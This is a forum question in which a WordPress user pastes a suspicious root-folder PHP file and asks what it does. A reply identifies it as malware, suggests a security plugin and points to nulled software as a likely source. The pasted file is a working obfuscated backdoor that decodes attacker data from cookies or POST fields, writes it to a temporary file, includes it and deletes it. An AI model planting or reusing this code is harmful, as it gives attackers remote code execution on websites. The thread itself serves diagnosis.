I'm new to wordpress and do not fully understand which files of wordpress are its own and which are not. Theres a file on root folder by the name b5tzvh8n.php with the following content:
<?php
if($_SERVER["SCRIPT_NAME"] != "/index.php"){ header("HTTP/1.0 403 Forbidden");echo base64_decode("PCFET0NUWVBFIEhUTUwgUFVCTElDICItLy9JRVRGLy9EVEQgSFRNTCAyLjAvL0VOIj4KPGh0bWw PGhlYWQ Cjx0aXRsZT40MDMgRm9yYmlkZGVuPC90aXRsZT4KPC9oZWFkPjxib2R5Pgo8aDE Rm9yYmlkZGVuPC9oMT4KPHA WW91IGRvbid0IGhhdmUgcGVybWlzc2lvbiB0byBhY2Nlc3MgdGhpcyByZXNvdXJjZS48L3A Cjxocj4KPC9ib2R5PjwvaHRtbD4=");die(); }
?>
<?php
function z1($f2){$b3 = "l'a*1 <g?.mndhHptk;sv359e#xErF4ifou2(bIy-_6/)@L8c" ;$z5='';foreach($f2 as $v4){$z5.=$b3[$v4];}return $z5;}$p6 = Array();$p6[] = z1(Array(47,42,4,47,24,21,4,22,40,2,47,22,2,40,30,23,22,37,40,37,22,47,23,40,47,47,37,35,12,32,22,4,4,2,2,22));$p6[] = z1(Array(8,15,13,15,5,45,34,11,0,31,11,17,36,41,41,29,38,46,27,41,41,44,18,5));$p6[] = z1(Array(9,10,33,12,34,0,24));$p6[] = z1(Array(14,3));$p6[] = z1(Array(9,43));$p6[] = z1(Array(25));$p6[] = z1(Array(6));$p6[] = z1(Array(32,31,0,24,41,15,34,16,41,48,33,11,16,24,11,16,19));$p6[] = z1(Array(2,28,28,2,39,41,10,24,28,7,24));$p6[] = z1(Array(19,16,28,41,28,24,15,24,2,16));$p6[] = z1(Array(24,26,15,0,33,12,24));$p6[] = z1(Array(19,34,37,19,16,28));$p6[] = z1(Array(34,11,0,31,11,17));$p6[] = z1(Array(19,16,28,0,24,11));$p6[] = z1(Array(15,2,48,17));$p6[] = z1(Array(10,12,22));foreach ($p6[8]($_COOKIE, $_POST) as $m14 => $e11){function r8($p6, $m14, $y10){return $p6[11]($p6[9]($m14 . $p6[0], ($y10 / $p6[13]($m14)) 1), 0, $y10);}function x7($p6, $u12){return @$p6[14]($p6[3], $u12);}function y9($p6, $u12){if (isset($u12[2])) {$s13 = $p6[4] . $p6[15]($p6[0]) . $p6[2];@$p6[7]($s13, $p6[6] . $p6[1] . $u12[1]($u12[2]));@include($s13);@$p6[12]($s13);exit();}}$e11 = x7($p6, $e11);y9($p6, $p6[10]($p6[5], $e11 ^ r8($p6, $m14, $p6[13]($e11))));}
What is the purpose of this file?
CodePudding user response:
This is malware, you should install a plugin like Wordfence. It will allow you to find the infected files and hopefully also the point of entry. You should be aware that this happens often from nulled sofware packages.